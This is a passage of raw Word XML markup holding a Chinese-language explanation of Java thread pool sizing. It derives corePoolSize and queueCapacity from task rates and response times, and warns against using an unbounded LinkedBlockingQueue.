          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tasktime</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，处理第个任务所需要的时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="003A06A5" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>responsetime</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，系统允许任务最大的响应时间，比如每个任务的响应时间不得超过</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>秒。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="0004694D" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004694D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>corePoolSize:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每个任务需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tasktime</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>秒处理，则每个线程每钞可处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1/tasktime</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个任务。系统每秒有</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个任务需要处理，则需要的线程数为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tasks/(1/tasktime)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，即</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tasks*tasktime</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个线程数。假设系统每秒任务数为</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>100~1000</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，每个任务耗时</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>秒，则需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>100*0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>至</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1000*0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，即</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10~100</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个线程。那么</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>corePoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应该设置为大于</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，具体数字最好根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8020</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>原则，即</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>80%</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>情况下系统每秒任务数，若系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>80%</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的情况下第秒任务数小于</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，最多时为</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，则</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>corePoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="0004694D" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004694D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>queueCapacity:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="0004694D" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>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lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>任务队列的长度要根据核心线程数，以及系统对任务响应时间的要求有关。队列长度可以设置为</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(corePoolSize/tasktime)*responsetime</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (20/0.1)*2=400</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，即队列长度可设置为</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>400</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>队列长度设置过大，会导致任务响应时间过长，切忌以下写法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LinkedBlockingQueue queue = new LinkedBlockingQueue();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00065CA7" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这实际上是将队列长度设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="00065CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Integer.MAX_VALUE</w:t>
      </w:r>
      <w:r w:rsidRPr="00065CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，将会导致线程数量永远为</w:t>
      </w:r>
      <w:r w:rsidRPr="00065CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>corePoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00065CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，再也不会增加，当任务数量陡增时，任务响应时间也将随之陡增。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="0069188C" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069188C">
        <w:rPr>
